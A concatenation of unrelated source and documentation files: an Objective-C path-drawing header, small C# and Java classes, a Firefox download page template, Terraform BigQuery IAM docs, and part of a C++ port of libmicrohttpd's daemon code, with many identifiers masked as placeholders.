By default returns the same value as length. Override where the last path segment
length should be shown instead of the total path length.
@return the path's display length in points
*/
- (CGFloat)infoLengthForPath:(NSBezierPath*)path;
/** @brief Discover whether the path is open or closed.
A path is closed if it has a closePath element or its first and last points are coincident.
@return \c YES if the path is closed, \c NO if open
*/
@property (readonly, getter=isPathClosed) BOOL pathClosed;
- (void)recordPathForUndo;
- (NSBezierPath*)undoPath;
- (void)clearUndoPath;
// modifying paths
/** @brief Merges two paths by simply appending them
This simply appends the part of the other object to this one and recomputes the bounds, etc.
the result can act like a union, difference or XOR according to the relative placements of the
paths and the winding rules in use.
@param anotherPath another drawable path object like this one
*/
- (void)combine:(DKDrawablePath*)anotherPath;
/** @brief Converts each subpath in the current path to a separate object
A subpath is a path delineated by a moveTo opcode. Each one is made a separate new path. If there
is only one subpath (common) then the result will have just one entry.
@return an array of DKDrawablePath objects
*/
- (NSArray<DKDrawablePath*>*)breakApart;
/** @brief Delete the point from the path with the given part code
Only on-path points of a curve are allowed to be deleted, not control points. The partcodes will
be renumbered by this, so do not cache the partcode beyond this point.
@param pc the partcode to delete
@return YES if the point could be deleted, NO if not */
- (BOOL)<API key>:(NSInteger)pc;
/** @brief Delete a segment from the path at the given index
If the element id removed from the middle, the path is split into two subpaths. If removed at
either end, the path is shortened. Partcodes will change.
@param indx the index of the element to delete
@return YES if the element was deleted, NO if not
*/
- (BOOL)<API key>:(NSInteger)indx;
/** @brief Delete a segment from the path at the given point
Finds the element hit by the point and calls -<API key>:
@param loc a point
@return YES if the element was deleted, NO if not
*/
- (BOOL)<API key>:(NSPoint)loc;
- (NSInteger)pathInsertPointAt:(NSPoint)loc ofType:(<API key>)pathPointType;
/** @brief Move a single control point to a new position
Essential interactive editing method
@param pc the partcode for the point to be moved
@param mp the point to move it to
@param evt the event (used to grab modifier flags) */
- (void)movePathPartcode:(NSInteger)pc toPoint:(NSPoint)mp event:(NSEvent*)evt;
/** @brief Preflights a potential join to determine if the join would be made
Allows a join operation to be preflighted without actually performing the join.
@param anotherPath another drawable path object like this one
@param tol a value used to determine if the end points are placed sufficiently close to be joinable
@return a join result value, indicating which end(s) would be joined, if any
*/
- (<API key>)wouldJoin:(DKDrawablePath*)anotherPath tolerance:(CGFloat)tol;
/** @brief Joins open paths together at their ends
This attempts to join either or both ends of the two paths if they are placed sufficiently
closely. Usually the higher level join action at the layer level will be used.
@param anotherPath another drawable path object like this one
@param tol a value used to determine if the end points are placed sufficiently close to be joinable
@param colin if YES, and the joined segments are curves, this adjusts the control points of the curve
@return a join result value, indicating which end(s) were joined, if any
*/
- (<API key>)join:(DKDrawablePath*)anotherPath tolerance:(CGFloat)tol makeColinear:(BOOL)colin;
/** @brief Splits a path into two paths at a specific point
The new path has the same style and user info as the original, but is not added to the layer
by this method. If <distance> is <= 0 or >= length, nil is returned.
@param distance the position from the start of the path to make the split
@return a new path, being the section of the original path from <distance> to the end.
*/
- (nullable DKDrawablePath*)dividePathAtLength:(CGFloat)distance;
// creating paths
@property <API key> pathCreationMode;
/** @brief Test for the ending criterion of a path loop
Currently only checks for a double-click
@param event an event
@return YES to end the loop, NO to continue
*/
- (BOOL)<API key>:(NSEvent*)event;
/** @brief Discover whether the given partcode is an open end point of the path
A closed path always returns NO, as it has no open end points. An open path will return YES for
only the first and last points.
@param partcode a partcode to test
@return YES if the partcode is one of the endpoints, NO otherwise
*/
- (BOOL)isOpenEndPoint:(NSInteger)partcode;
/** @brief Whether the object is extending its path or starting from scratch.
When <code>YES</code>, this affects the starting partcode for the creation process. Normally paths are started
from scratch, but if <code>YES</code>, this extends the existing path from its end if the path is open. The
tool that coordinates the creation of new objects is reposnsible for managing this appropriately.
*/
@property BOOL <API key>;
/** @brief Event loop for creating a curved path point by point
Keeps control until the ending criteria are met (double-click or click on first point).
@param initialPoint where to start
*/
- (void)pathCreateLoop:(NSPoint)initialPoint;
/** @brief Event loop for creating a single straight line
Keeps control until the ending criteria are met (second click).
@param initialPoint where to start
*/
- (void)lineCreateLoop:(NSPoint)initialPoint;
/** @brief Event loop for creating a polygon consisting of straight line sections
Keeps control until the ending criteria are met (double-click or click on start point).
@param initialPoint where to start
*/
- (void)polyCreateLoop:(NSPoint)initialPoint;
/** @brief Event loop for creating a curved path by fitting it to a series of sampled points
Keeps control until the ending criteria are met (mouse up).
@param initialPoint where to start
*/
- (void)freehandCreateLoop:(NSPoint)initialPoint;
/** @brief Event loop for creating an arc or a wedge
Keeps control until the ending criteria are met (second click).
@param initialPoint where to start
*/
- (void)arcCreateLoop:(NSPoint)initialPoint;
/** @brief Overrideable hook at the end of path creation
*/
- (void)<API key>;
- (NSEvent*)postMouseUpAtPoint:(NSPoint)p;
/** @brief The smoothness of paths created in freehand mode.
The bigger the number, the smoother but less accurate the path. The value is the distance in
base units that a point has to be to the path to be considered a fit. Typical values are between 1 and 20.
*/
@property CGFloat freehandSmoothing;
// converting to other types
- (DKDrawableShape*)makeShape;
@property (readonly) BOOL canConvertToTrack;
/** @brief Make a copy of the path but with a parallel offset
@param distance the distance from the original that the path is offset (negative forupward displacement)
@param smooth if YES, also smooths the resulting path
@return a DKDrawablePath object
*/
- (DKDrawablePath*)<API key>:(CGFloat)distance smooth:(BOOL)smooth;
// user level commands this object can respond to:
/** @brief Converts this object to he equivalent shape
Undoably replaces itself in its current layer by the equivalent shape object
@param sender the action's sender
*/
- (IBAction)convertToShape:(nullable id)sender;
/** @brief Adds some random offset to every point on the path
Just a fun effect
@param sender the action's sender
*/
- (IBAction)addRandomNoise:(nullable id)sender;
/** @brief Replaces the path with an outline of the path
The result depends on the style - specifically the maximum stroke width. The path is replaced by
a path whose edges are where the edge of the stroke of the original path lie. The topmost stroke
is used to set the fill of the resulting object's style. The result is similar but not always
identical to the original. For complex styles you will lose a lot of information.
@param sender the action's sender
*/
- (IBAction)convertToOutline:(nullable id)sender;
/** @brief Replaces the object with new objects, one for each subpath in the original
@param sender the action's sender
*/
- (IBAction)breakApart:(nullable id)sender;
- (IBAction)roughenPath:(nullable id)sender;
/** @brief Tries to smooth a path by curve fitting. If the path is already made up from bezier elements,
this will have no effect. vector paths can benefit however.
The current set smoothness value is used
@param sender the action's sender
*/
- (IBAction)smoothPath:(nullable id)sender;
/** @brief Tries to smooth a path by curve fitting. If the path is already made up from bezier elements,
this will have no effect. vector paths can benefit however.
The current set smoothness value x4 is used
@param sender the action's sender
*/
- (IBAction)smoothPathMore:(nullable id)sender;
/** @brief Adds a copy of the receiver to the drawing with a parallel offset path
This is really just a test of the algorithm
@param sender the action's sender
*/
- (IBAction)parallelCopy:(nullable id)sender;
/** @brief Attempts to curve-fit the object's path
The path might not change, depending on how it is made up
@param sender the action's sender
*/
- (IBAction)curveFit:(nullable id)sender;
/** @brief Reverses the direction of the object's path
Does not change the path's appearance directly, but may depending on the current style, e.g. arrows
will flip to the other end.
@param sender the action's sender
*/
- (IBAction)reversePath:(nullable id)sender;
/** @brief Flips the path horizontally
The path is flipped directly
@param sender the action's sender
*/
- (IBAction)<API key>:(nullable id)sender;
/** @brief Flips the path vertically
The path is flipped directly
@param sender the action's sender
*/
- (IBAction)toggleVerticalFlip:(nullable id)sender;
/** @brief Closes the path if not already closed
Paths created using the bezier tool are always left open by default
@param sender the action's sender
*/
- (IBAction)closePath:(nullable id)sender;
@end
enum {
//! special partcode value used to mean snap to the nearest point on the path itself:
<API key> = -99
};
extern NSPoint gMouseForPathSnap;
extern NSString* const <API key>;
<API key> |
namespace Conjure.EFX.Options
{
<summary>
Create model file generation options
</summary>
<seealso cref="EntityFrameworkCore.Generator.Options.ModelOptionsBase" />
public class CreateModelOptions : BaseModelOptions
{
<summary>
Initializes a new instance of the <see cref="CreateModelOptions"/> class.
</summary>
public CreateModelOptions(VariableDictionary variables, string prefix)
: base(variables, AppendPrefix(prefix, "Create"))
{
Name = "{Entity.Name}CreateModel";
}
}
} |
package com.sensia.tools.client.swetools.editors.sensorml.renderer.editor.panels.sml;
import com.sensia.relaxNG.RNGElement;
import com.sensia.relaxNG.RNGTag;
import com.sensia.tools.client.swetools.editors.sensorml.panels.AbstractPanel;
import com.sensia.tools.client.swetools.editors.sensorml.panels.IPanel;
import com.sensia.tools.client.swetools.editors.sensorml.panels.IRefreshHandler;
import com.sensia.tools.client.swetools.editors.sensorml.renderer.editor.panels.line.<API key>;
public class <API key> extends <API key><RNGElement>{
private boolean isLabel = false;
public <API key>(RNGElement tag,IRefreshHandler refreshHandler) {
super(tag,refreshHandler);
}
@Override
public String getName() {
return getTag().getName();
}
@Override
protected void addInnerElement(IPanel<? extends RNGTag> element) {
if(element.getName().equals("label")) {
labelPanel.add(element.getPanel());
} else if(element.getName().equals("definition")) {
defPanel.add(element.getPanel());
} else if(element.getName().equals("description")) {
afterDotsPanel.add(element.getPanel());
}
}
@Override
protected AbstractPanel<RNGElement> newInstance() {
// TODO Auto-generated method stub
return null;
}
} |
{% extends "/firefox/base-resp.html" %}
{% add_lang_files "mobile" %}
{% block page_title %}Mozilla Firefox {% endblock %}
{% block page_title_suffix %}{% endblock %}
{% block body_id %}firefox-download{% endblock %}
{% block page_desc %} Firefox WindowsMac Linux{% endblock %}
{% block site_header_logo %}
<h2><a href="{{ url('mozorg.home') }}"><img src="{{ media('img/firefox/template/header-logo-inverse.png') }}" alt="Mozilla Firefox" width="130" height="49"></a></h2>
{% endblock %}
{% block site_css %}
{{ css('firefox_download') }}
{% endblock %}
{% block js %}
{{ js('firefox_download') }}
{% endblock %}
{% block breadcrumbs %}
<nav class="<API key>">
<a class="home" href="{{ url('mozorg.home') }}">{{_('Home')}}</a>
<b>»</b>
<a href="{{ url('firefox.desktop.index') }}">Firefox </a>
<b>»</b>
<span>Firefox </span>
</nav>
{% endblock %}
{% block content %}
{% if request.locale.startswith('en') %}
{% set mobile_link = url('firefox.fx') + '#mobile' %}
{% else %}
{% set mobile_link = '/firefox/mobile/features/' %}
{% endif %}
<div id="main-feature">
<h1>Firefox <br /><strong></strong><br /></h1>
</div>
<article id="main-content" class="billboard">
<p class="download-content">Firefox!<br>Mozilla<br></p>
<div id="default-steps" class="download">
<p><a id="default-download" href="http://download.myfirefox.com.tw/releases/webins3.0/official/zh-TW/Firefox-latest.exe" title="firefox download"></a></p>
</div>
<div id="mac-steps" class="download">
<ol class="install-steps">
<li class="one"><p><a id="mac-download" href="http://download.myfirefox.com.tw/releases/firefox/zh-TW/Firefox-latest.dmg" title="firefox download"></a></p></li>
<li class="two"><p> Firefox </p></li>
<li class="three"><p>Firefox Mac dockFirefox </p></li>
</ol>
</div>
<p class="download-content"> <a href="/firefox/features/">Firefox </a><br>
<a href="/firefox/faq/"></a>
<div class="download-separator"></div>
{{ download_firefox(install=request.GET['install'], direct_download=True) }}
<div class="all_versions">
<ul>
<li>Windows</li>
<li class="win-express"><a href="?os=win&install=express">Windows </a></li>
<li class="win-full"><a href="?os=win&install=full">Windows </a></li>
</ul>
<ul>
<li>Mac</li>
<li class="osx"><a href="?os=osx">Mac OSX</a></li>
</ul>
<ul>
<li>Linux</li>
<li class="linux-32bit"><a href="?os=linux&install=32bit">Linux 32bit</a></li>
<li class="linux-64bit"><a href="?os=linux&install=64bit">Linux 64bit</a></li>
</ul>
</div>
<div class="other_langs">
<a href="{{ url('firefox.all') }}"> Other Language Versions</a>
</div>
</article>
{% endblock %}
{% block email_form %}
<div id="email-form-wrapper" class="billboard">
{{ super() }}
</div>
{% endblock%}
{% block site_footer %}
<section id="colophon" class="billboard">
<nav id="footer">
{% include 'firefox/includes/simple_footer_items.html' %}
</nav>
</section>
{% endblock %} |
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
namespace <API key>
{
public static partial class <API key>
{
<summary>
Returns all elements in a sequence, excluding the last.
</summary>
<typeparam name="T"></typeparam>
<param name="sequence"></param>
<returns></returns>
public static IEnumerable<T> ButLast<T>(this IEnumerable<T> sequence)
{
if (sequence == null) throw new <API key>(nameof(sequence));
return ButLastImpl<T>(sequence);
}
private static IEnumerable<T> ButLastImpl<T>(IEnumerable<T> sequence)
{
using (var iterator = sequence.GetEnumerator())
{
if (!iterator.MoveNext()) yield break;
var previous = iterator.Current;
while (iterator.MoveNext())
{
yield return previous;
previous = iterator.Current;
}
}
}
}
} |
layout: "google"
subcategory: "BigQuery"
page_title: "Google: <API key>"
sidebar_current: "<API key>"
description: |-
Collection of resources to manage IAM policy for a BigQuery dataset.
# IAM policy for BigQuery dataset
Three different resources help you manage your IAM policy for BigQuery dataset. Each of these resources serves a different use case:
* `<API key>`: Authoritative. Sets the IAM policy for the dataset and replaces any existing policy already attached.
* `<API key>`: Authoritative for a given role. Updates the IAM policy to grant a role to a list of members. Other roles within the IAM policy for the dataset are preserved.
* `<API key>`: Non-authoritative. Updates the IAM policy to grant a role to a new member. Other members for the role for the dataset are preserved.
These resources are intended to convert the permissions system for BigQuery datasets to the standard IAM interface. For advanced usages, including [creating authorized views](https://cloud.google.com/bigquery/docs/share-access-views), please use either `<API key>` or the `access` field on `<API key>`.
~> **Note:** These resources **cannot** be used with `<API key>` resources or the `access` field on `<API key>` or they will fight over what the policy should be.
~> **Note:** Using any of these resources will remove any authorized view permissions from the dataset. To assign and preserve authorized view permissions use the `<API key>` instead.
~> **Note:** Legacy BigQuery roles `OWNER` `WRITER` and `READER` **cannot** be used with any of these IAM resources. Instead use the full role form of: `roles/bigquery.dataOwner` `roles/bigquery.dataEditor` and `roles/bigquery.dataViewer`.
~> **Note:** `<API key>` **cannot** be used in conjunction with `<API key>` and `<API key>` or they will fight over what your policy should be.
~> **Note:** `<API key>` resources **can be** used in conjunction with `<API key>` resources **only if** they do not grant privilege to the same role.
## google\_bigquery\_dataset\_iam\_policy
hcl
data "google_iam_policy" "owner" {
binding {
role = "roles/dataOwner"
members = [
"user:jane@example.com",
]
}
}
resource "<API key>" "dataset" {
dataset_id = "your-dataset-id"
policy_data = data.google_iam_policy.owner.policy_data
}
## google\_bigquery\_dataset\_iam\_binding
hcl
resource "<API key>" "reader" {
dataset_id = "your-dataset-id"
role = "roles/bigquery.dataViewer"
members = [
"user:jane@example.com",
]
}
## google\_bigquery\_dataset\_iam\_member
hcl
resource "<API key>" "editor" {
dataset_id = "your-dataset-id"
role = "roles/bigquery.dataEditor"
member = "user:jane@example.com"
}
## Argument Reference
The following arguments are supported:
* `dataset_id` - (Required) The dataset ID.
* `member/members` - (Required) Identities that will be granted the privilege in `role`.
Each entry can have one of the following values:
* **allUsers**: A special identifier that represents anyone who is on the internet; with or without a Google account.
* **<API key>**: A special identifier that represents anyone who is authenticated with a Google account or a service account.
* **user:{emailid}**: An email address that represents a specific Google account. For example, alice@gmail.com or joe@example.com.
* **serviceAccount:{emailid}**: An email address that represents a service account. For example, my-other-app@appspot.gserviceaccount.com.
* **group:{emailid}**: An email address that represents a Google group. For example, admins@example.com.
* **domain:{domain}**: A G Suite domain (primary, instead of alias) name that represents all the users of that domain. For example, google.com or example.com.
* `role` - (Required) The role that should be applied. Only one
`<API key>` can be used per role. Note that custom roles must be of the format
`[projects|organizations]/{parent-name}/roles/{role-name}`.
* `policy_data` - (Required only by `<API key>`) The policy data generated by
a `google_iam_policy` data source.
## Attributes Reference
In addition to the arguments listed above, the following computed attributes are
exported:
* `etag` - (Computed) The etag of the dataset's IAM policy.
## Import
IAM member imports use space-delimited identifiers; the resource in question, the role, and the account. This member resource can be imported using the `dataset_id`, role, and account e.g.
$ terraform import <API key>.dataset_iam "projects/your-project-id/datasets/dataset-id roles/viewer user:foo@example.com"
IAM binding imports use space-delimited identifiers; the resource in question and the role. This binding resource can be imported using the `dataset_id` and role, e.g.
$ terraform import <API key>.dataset_iam "projects/your-project-id/datasets/dataset-id roles/viewer"
IAM policy imports use the identifier of the resource in question. This policy resource can be imported using the `dataset_id`, role, and account e.g.
$ terraform import <API key>.dataset_iam projects/your-project-id/datasets/dataset-id
-> **Custom Roles**: If you're importing a IAM resource with a custom role, make sure to use the
full name of the custom role, e.g. `[projects/my-project|organizations/my-org]/roles/my-custom-role`. |
// Changes: - converted to C++
// - added ufal::microrestd::libmicrohttpd namespace
// - use compile-time configuration instead of configure script
/**
* @file microhttpd/daemon.c
* @brief A minimal-HTTP server library
* @author Daniel Pittman
* @author Christian Grothoff
*/
#if defined(_WIN32) && !defined(__CYGWIN__)
/* override small default value */
#define FD_SETSIZE 1024
#define <API key> 64
#else
#define <API key> FD_SETSIZE
#endif
#include "platform.h"
#include "internal.h"
#include "response.h"
#include "connection.h"
#include "memorypool.h"
#include <limits.h>
#include "autoinit_funcs.h"
#if HAVE_SEARCH_H
#include <search.h>
#else
#include "tsearch.h"
#endif
#if HTTPS_SUPPORT
#include "connection_https.h"
#include <gcrypt.h>
#endif
#ifdef HAVE_POLL_H
#include <poll.h>
#endif
#ifdef LINUX
#include <sys/sendfile.h>
#endif
#ifdef _WIN32
#ifndef WIN32_LEAN_AND_MEAN
#define WIN32_LEAN_AND_MEAN 1
#endif /* !WIN32_LEAN_AND_MEAN */
#include <windows.h>
#endif
namespace ufal {
namespace microrestd {
namespace libmicrohttpd {
#ifndef HAVE_ACCEPT4
#define HAVE_ACCEPT4 0
#endif
/**
* Default connection limit.
*/
#ifndef WINDOWS
#define <API key> FD_SETSIZE - 4
#else
#define <API key> FD_SETSIZE
#endif
/**
* Default memory allowed per connection.
*/
#define <API key> (32 * 1024)
#ifdef TCP_FASTOPEN
/**
* Default TCP fastopen queue size.
*/
#define <API key> 10
#endif
/**
* Print extra messages with reasons for closing
* sockets? (only adds non-error messages).
*/
#define DEBUG_CLOSE MHD_NO
/**
* Print extra messages when establishing
* connections? (only adds non-error messages).
*/
#define DEBUG_CONNECT MHD_NO
#ifndef LINUX
#ifndef MSG_NOSIGNAL
#define MSG_NOSIGNAL 0
#endif
#endif
#ifndef SOCK_CLOEXEC
#define SOCK_CLOEXEC 0
#endif
#ifndef EPOLL_CLOEXEC
#define EPOLL_CLOEXEC 0
#endif
/**
* Default implementation of the panic function,
* prints an error message and aborts.
*
* @param cls unused
* @param file name of the file with the problem
* @param line line number with the problem
* @param reason error message with details
*/
static void
mhd_panic_std (void * /*cls*/,
const char *file,
unsigned int line,
const char *reason)
{
#if HAVE_MESSAGES
fprintf (stderr, "Fatal error in GNU libmicrohttpd %s:%u: %s\n",
file, line, reason);
#endif
abort ();
}
/**
* Handler for fatal errors.
*/
MHD_PanicCallback mhd_panic;
/**
* Closure argument for "mhd_panic".
*/
void *mhd_panic_cls;
#ifdef _WIN32
/**
* Track initialization of winsock
*/
static int mhd_winsock_inited_ = 0;
#endif
/**
* Trace up to and return master daemon. If the supplied daemon
* is a master, then return the daemon itself.
*
* @param daemon handle to a daemon
* @return master daemon handle
*/
static struct MHD_Daemon*
MHD_get_master (struct MHD_Daemon *daemon)
{
while (NULL != daemon->master)
daemon = daemon->master;
return daemon;
}
/**
* Maintain connection count for single address.
*/
struct MHD_IPCount
{
/**
* Address family. AF_INET or AF_INET6 for now.
*/
int family;
/**
* Actual address.
*/
union
{
/**
* IPv4 address.
*/
struct in_addr ipv4;
#if HAVE_INET6
/**
* IPv6 address.
*/
struct in6_addr ipv6;
#endif
} addr;
/**
* Counter.
*/
unsigned int count;
};
/**
* Lock shared structure for IP connection counts and connection DLLs.
*
* @param daemon handle to daemon where lock is
*/
static void
MHD_ip_count_lock (struct MHD_Daemon *daemon)
{
if (MHD_YES != MHD_mutex_lock_(&daemon-><API key>))
{
MHD_PANIC ("Failed to acquire IP connection limit mutex\n");
}
}
/**
* Unlock shared structure for IP connection counts and connection DLLs.
*
* @param daemon handle to daemon where lock is
*/
static void
MHD_ip_count_unlock (struct MHD_Daemon *daemon)
{
if (MHD_YES != MHD_mutex_unlock_(&daemon-><API key>))
{
MHD_PANIC ("Failed to release IP connection limit mutex\n");
}
}
/**
* Tree comparison function for IP addresses (supplied to tsearch() family).
* We compare everything in the struct up through the beginning of the
* 'count' field.
*
* @param a1 first address to compare
* @param a2 second address to compare
* @return -1, 0 or 1 depending on result of compare
*/
static int
MHD_ip_addr_compare (const void *a1, const void *a2)
{
return memcmp (a1, a2, offsetof (struct MHD_IPCount, count));
}
/**
* Parse address and initialize 'key' using the address.
*
* @param addr address to parse
* @param addrlen number of bytes in addr
* @param key where to store the parsed address
* @return #MHD_YES on success and #MHD_NO otherwise (e.g., invalid address type)
*/
static int
MHD_ip_addr_to_key (const struct sockaddr *addr,
socklen_t addrlen,
struct MHD_IPCount *key)
{
memset(key, 0, sizeof(*key));
/* IPv4 addresses */
if (sizeof (struct sockaddr_in) == addrlen)
{
const struct sockaddr_in *addr4 = (const struct sockaddr_in*) addr;
key->family = AF_INET;
memcpy (&key->addr.ipv4, &addr4->sin_addr, sizeof(addr4->sin_addr));
return MHD_YES;
}
#if HAVE_INET6
/* IPv6 addresses */
if (sizeof (struct sockaddr_in6) == addrlen)
{
const struct sockaddr_in6 *addr6 = (const struct sockaddr_in6*) addr;
key->family = AF_INET6;
memcpy (&key->addr.ipv6, &addr6->sin6_addr, sizeof(addr6->sin6_addr));
return MHD_YES;
}
#endif
/* Some other address */
return MHD_NO;
}
/**
* Check if IP address is over its limit.
*
* @param daemon handle to daemon where connection counts are tracked
* @param addr address to add (or increment counter)
* @param addrlen number of bytes in addr
* @return Return #MHD_YES if IP below limit, #MHD_NO if IP has surpassed limit.
* Also returns #MHD_NO if fails to allocate memory.
*/
static int
MHD_ip_limit_add (struct MHD_Daemon *daemon,
const struct sockaddr *addr,
socklen_t addrlen)
{
struct MHD_IPCount *key;
void **nodep;
void *node;
int result;
daemon = MHD_get_master (daemon);
/* Ignore if no connection limit assigned */
if (0 == daemon-><API key>)
return MHD_YES;
if (NULL == (key = (struct MHD_IPCount*) malloc (sizeof(*key))))
return MHD_NO;
/* Initialize key */
if (MHD_NO == MHD_ip_addr_to_key (addr, addrlen, key))
{
/* Allow unhandled address types through */
free (key);
return MHD_YES;
}
MHD_ip_count_lock (daemon);
/* Search for the IP address */
if (NULL == (nodep = (void**) tsearch (key,
&daemon-><API key>,
&MHD_ip_addr_compare)))
{
#if HAVE_MESSAGES
MHD_DLOG (daemon,
"Failed to add IP connection count node\n");
#endif
MHD_ip_count_unlock (daemon);
free (key);
return MHD_NO;
}
node = *nodep;
/* If we got an existing node back, free the one we created */
if (node != key)
free(key);
key = (struct MHD_IPCount *) node;
/* Test if there is room for another connection; if so,
* increment count */
result = (key->count < daemon-><API key>);
if (MHD_YES == result)
++key->count;
MHD_ip_count_unlock (daemon);
return result;
}
/**
* Decrement connection count for IP address, removing from table
* count reaches 0.
*
* @param daemon handle to daemon where connection counts are tracked
* @param addr address to remove (or decrement counter)
* @param addrlen number of bytes in @a addr
*/
static void
MHD_ip_limit_del (struct MHD_Daemon *daemon,
const struct sockaddr *addr,
socklen_t addrlen)
{
struct MHD_IPCount search_key;
struct MHD_IPCount *found_key;
void **nodep;
daemon = MHD_get_master (daemon);
/* Ignore if no connection limit assigned */
if (0 == daemon-><API key>)
return;
/* Initialize search key */
if (MHD_NO == MHD_ip_addr_to_key (addr, addrlen, &search_key))
return;
MHD_ip_count_lock (daemon);
/* Search for the IP address */
if (NULL == (nodep = (void**) tfind (&search_key,
&daemon-><API key>,
&MHD_ip_addr_compare)))
{
/* Something's wrong if we couldn't find an IP address
* that was previously added */
MHD_PANIC ("Failed to find previously-added IP address\n");
}
found_key = (struct MHD_IPCount *) *nodep;
/* Validate existing count for IP address */
if (0 == found_key->count)
{
MHD_PANIC ("Previously-added IP address had 0 count\n");
}
/* Remove the node entirely if count reduces to 0 */
if (0 == --found_key->count)
{
tdelete (found_key,
&daemon-><API key>,
&MHD_ip_addr_compare);
free (found_key);
}
MHD_ip_count_unlock (daemon);
}
#if HTTPS_SUPPORT
/**
* Callback for receiving data from the socket.
*
* @param connection the MHD_Connection structure
* @param other where to write received data to
* @param i maximum size of other (in bytes)
* @return number of bytes actually received
*/
static ssize_t
recv_tls_adapter (struct MHD_Connection *connection, void *other, size_t i)
{
int res;
if (MHD_YES == connection->tls_read_ready)
{
connection->daemon->num_tls_read_ready
connection->tls_read_ready = MHD_NO;
}
res = gnutls_record_recv (connection->tls_session, other, i);
if ( (GNUTLS_E_AGAIN == res) ||
(<API key> == res) )
{
<API key> (EINTR);
#if EPOLL_SUPPORT
connection->epoll_state &= ~<API key>;
#endif
return -1;
}
if (res < 0)
{
/* Likely '<API key>' (client communication
disrupted); set errno to something caller will interpret
correctly as a hard error */
<API key> (ECONNRESET);
return res;
}
if (res == i)
{
connection->tls_read_ready = MHD_YES;
connection->daemon->num_tls_read_ready++;
}
return res;
}
/**
* Callback for writing data to the socket.
*
* @param connection the MHD connection structure
* @param other data to write
* @param i number of bytes to write
* @return actual number of bytes written
*/
static ssize_t
send_tls_adapter (struct MHD_Connection *connection,
const void *other, size_t i)
{
int res;
res = gnutls_record_send (connection->tls_session, other, i);
if ( (GNUTLS_E_AGAIN == res) ||
(<API key> == res) )
{
<API key> (EINTR);
#if EPOLL_SUPPORT
connection->epoll_state &= ~<API key>;
#endif
return -1;
}
if (res < 0)
{
/* some other GNUTLS error, should set 'errno'; as we do not
really understand the error (not listed in GnuTLS
documentation explicitly), we set 'errno' to something that
will cause the connection to fail. */
<API key> (ECONNRESET);
return -1;
}
return res;
}
/**
* Read and setup our certificate and key.
*
* @param daemon handle to daemon to initialize
* @return 0 on success
*/
static int
<API key> (struct MHD_Daemon *daemon)
{
gnutls_datum_t key;
gnutls_datum_t cert;
#if <API key> >= 3
if (NULL != daemon->cert_callback)
{
<API key> (daemon->x509_cred,
daemon->cert_callback);
}
#endif
if (NULL != daemon->https_mem_trust)
{
cert.data = (unsigned char *) daemon->https_mem_trust;
cert.size = strlen (daemon->https_mem_trust);
if (<API key> (daemon->x509_cred, &cert,
GNUTLS_X509_FMT_PEM) < 0)
{
#if HAVE_MESSAGES
MHD_DLOG(daemon,
"Bad trust certificate format\n");
#endif
return -1;
}
}
if (MHD_YES == daemon->have_dhparams)
{
<API key> (daemon->x509_cred,
daemon->https_mem_dhparams);
}
/* certificate & key loaded from memory */
if ( (NULL != daemon->https_mem_cert) &&
(NULL != daemon->https_mem_key) )
{
key.data = (unsigned char *) daemon->https_mem_key;
key.size = strlen (daemon->https_mem_key);
cert.data = (unsigned char *) daemon->https_mem_cert;
cert.size = strlen (daemon->https_mem_cert);
return <API key> (daemon->x509_cred,
&cert, &key,
GNUTLS_X509_FMT_PEM);
}
#if <API key> >= 3
if (NULL != daemon->cert_callback)
return 0;
#endif
#if HAVE_MESSAGES
MHD_DLOG (daemon,
"You need to specify a certificate and key location\n");
#endif
return -1;
}
/**
* Initialize security aspects of the HTTPS daemon
*
* @param daemon handle to daemon to initialize
* @return 0 on success
*/
static int
MHD_TLS_init (struct MHD_Daemon *daemon)
{
switch (daemon->cred_type)
{
case <API key>:
if (0 !=
<API key> (&daemon->x509_cred))
return <API key>;
return <API key> (daemon);
default:
#if HAVE_MESSAGES
MHD_DLOG (daemon,
"Error: invalid credentials type %d specified.\n",
daemon->cred_type);
#endif
return -1;
}
}
#endif
/**
* Add @a fd to the @a set. If @a fd is
* greater than @a max_fd, set @a max_fd to @a fd.
*
* @param fd file descriptor to add to the @a set
* @param set set to modify
* @param max_fd maximum value to potentially update
* @param fd_setsize value of FD_SETSIZE
* @return #MHD_YES on success, #MHD_NO otherwise
*/
static int
add_to_fd_set (MHD_socket fd,
fd_set *set,
MHD_socket *max_fd,
unsigned int fd_setsize)
{
if (NULL == set)
return MHD_NO;
#ifdef MHD_WINSOCK_SOCKETS
if (set->fd_count >= fd_setsize)
{
if (FD_ISSET(fd, set))
return MHD_YES;
else
return MHD_NO;
}
#else // ! MHD_WINSOCK_SOCKETS
if (fd >= int(fd_setsize))
return MHD_NO;
#endif // ! MHD_WINSOCK_SOCKETS
FD_SET (fd, set);
if ( (NULL != max_fd) && (MHD_INVALID_SOCKET != fd) &&
((fd > *max_fd) || (MHD_INVALID_SOCKET == *max_fd)) )
*max_fd = fd;
return MHD_YES;
}
#undef MHD_get_fdset
/**
* Obtain the `select()` sets for this daemon.
* Daemon's FDs will be added to fd_sets. To get only
* daemon FDs in fd_sets, call FD_ZERO for each fd_set
* before calling this function. FD_SETSIZE is assumed
* to be platform's default.
*
* @param daemon daemon to get sets from
* @param read_fd_set read set
* @param write_fd_set write set
* @param except_fd_set except set
* @param max_fd increased to largest FD added (if larger
* than existing value); can be NULL
* @return #MHD_YES on success, #MHD_NO if this
* daemon was not started with the right
* options for this call or any FD didn't
* fit fd_set.
* @ingroup event
*/
int
MHD_get_fdset (struct MHD_Daemon *daemon,
fd_set *read_fd_set,
fd_set *write_fd_set,
fd_set *except_fd_set,
MHD_socket *max_fd)
{
return MHD_get_fdset2(daemon, read_fd_set,
write_fd_set, except_fd_set,
max_fd, <API key>);
}
/**
* Obtain the `select()` sets for this daemon.
* Daemon's FDs will be added to fd_sets. To get only
* daemon FDs in fd_sets, call FD_ZERO for each fd_set
* before calling this function. Passing custom FD_SETSIZE
* as @a fd_setsize allow usage of larger/smaller than
* platform's default fd_sets.
*
* @param daemon daemon to get sets from
* @param read_fd_set read set
* @param write_fd_set write set
* @param except_fd_set except set
* @param max_fd increased to largest FD added (if larger
* than existing value); can be NULL
* @param fd_setsize value of FD_SETSIZE
* @return #MHD_YES on success, #MHD_NO if this
* daemon was not started with the right
* options for this call or any FD didn't
* fit fd_set.
* @ingroup event
*/
int
MHD_get_fdset2 (struct MHD_Daemon *daemon,
fd_set *read_fd_set,
fd_set *write_fd_set,
fd_set * /*except_fd_set*/,
MHD_socket *max_fd,
unsigned int fd_setsize)
{
struct MHD_Connection *pos;
if ( (NULL == daemon)
|| (NULL == read_fd_set)
|| (NULL == write_fd_set)
|| (MHD_YES == daemon->shutdown)
